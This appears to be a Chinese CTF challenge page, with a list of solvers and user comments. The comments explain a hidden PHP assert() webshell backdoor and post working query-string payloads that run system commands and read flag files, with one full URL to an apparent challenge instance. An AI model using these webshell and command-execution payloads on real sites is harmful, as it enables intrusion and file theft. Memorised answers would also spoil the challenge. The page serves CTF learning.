评分(10)
解题动态
doushabao 攻破了该题 25分钟前
Tomato薯条 攻破了该题 1小时前
yuu鱼 攻破了该题 2小时前
box 攻破了该题 10小时前
yinlin 攻破了该题 18小时前
我不是张先茂 攻破了该题 1天前
临安 攻破了该题 1天前
yyy1024 攻破了该题 1天前
周文君 攻破了该题 1天前
fu11dreamer 攻破了该题 1天前
yanqiu 攻破了该题 1天前
liu121389 攻破了该题 1天前
旦旦 攻破了该题 1天前
ZemoLee 攻破了该题 1天前
sokfock 攻破了该题 1天前
白科技 攻破了该题 1天前
be yourself 攻破了该题 1天前
Shining果果 攻破了该题 1天前
zzx 攻破了该题 1天前
评论
b2026tf 7天前
举报
本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');
syhaisy 13天前
举报
20702af5309ab1f70e0f7e8a81076a4e
hualong 15天前
举报
直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);
dlccom 19天前
举报
?s=readfile('/var/www/html/flaga15808abee46a1d5.txt'); 读出 flag
谢特恒123 1月前
举报
这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法
kitniu 1月前
举报
?s=system(dir),然后进入txt文件,flag{********}
攻防小哥 1月前
举报
flag{********}
smartada 2月前
举报
flag{****}
十里故清云 2月前
举报
?s=print_r(scandir('./')) ?s=print_r(file_get_contents(%27flaga15808abee46a1d5.txt%27)) system有可能失败,别用
TS3Rrrr 3月前
举报
大佬们 你们到底是怎么想到这些思路的我感觉在这做的每一道题都是在积累经验因为一个也想不出,只能看看大佬们的解题思路,如果不是只专攻ctf有其他类型的比赛是不是把这些思路更带入实战思考模式会好一点,还是说只要做的多就没有区别
windfalls 3天前
举报
这个提示很重要,免杀一句话木马,assert($_GET['s'])